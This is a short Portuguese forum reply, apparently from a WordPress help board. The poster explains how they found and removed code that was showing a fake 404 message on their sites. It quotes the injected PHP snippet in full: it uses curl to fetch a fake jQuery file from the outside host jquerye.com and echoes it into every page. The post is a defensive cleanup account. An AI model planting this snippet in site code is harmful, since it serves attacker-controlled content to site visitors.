Forum Replies Created

Viewing 1 replies (of 1 total)
  • Senhores, tive alguns problemas nos meus sites, exibia a seguinte mensagem no topo da página:

    OBJECT NOT FOUND!

    The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again.

    If you think this is a server error, please contact the webmaster.

    ERROR 404

    https://www.jquerye.com
    Wed Jan 23 13:34:52 2013
    Apache

    Consegui solucionar o problema da seguinte forma:
    Baixei o tema e a pasta de plugins via FTP para o meu computador utilizei o recurso do windows de pequisa por arquivos e procurei por PHP, o windows listou todos os arquivos PHP, utilizei o Dreamweaver para localizar “jquerye” encontrei o seguinte código:

    {if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}

    trata-se de um código mal intencionado, apenas exclui o código e no lugar dele deixei {}.

    Problema resolvido.

Viewing 1 replies (of 1 total)